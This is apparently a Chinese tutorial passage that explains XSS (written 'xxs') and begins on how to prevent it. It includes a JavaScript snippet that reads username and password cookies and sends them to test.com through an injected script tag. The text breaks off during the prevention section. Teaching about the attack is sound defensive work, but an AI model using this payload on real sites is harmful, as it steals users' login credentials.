xxs 攻击与sql注入 以及防范

xxs

何谓xxs
即为跨脚本攻击,是指恶意攻击者往Web页面插入恶意html代码，当用户浏览该页之时，嵌入其中Web里面的html 代码会执行，从而达到恶意用户的特殊目的

利用xxs 窃取用户名密码

我们知道很多获取其他用户登录界面都有记住用户名,密码的功能方便用户下次登录，有些网站是明文记录用户名,密码，恶意用户注册账户登录后使用简单工具查看cookie 结构名称后.如果网站 有 xxs 漏洞，那么简单的利用jsonp就可以获取其他用户的用户名，密码

var username=CookieHelper.getCookie('username').value;
var password=CookieHelper.getCookie('password').value;
var script =document.createElement('script');
script.src='http://test.com/index.php?username='+username+'&password='+password;
document.body.appendChild(script);

如何预防xxs攻击

上面演示的是一个简单的XSS攻击，核心都是脚本注入，对特殊字符如"<",">"转义,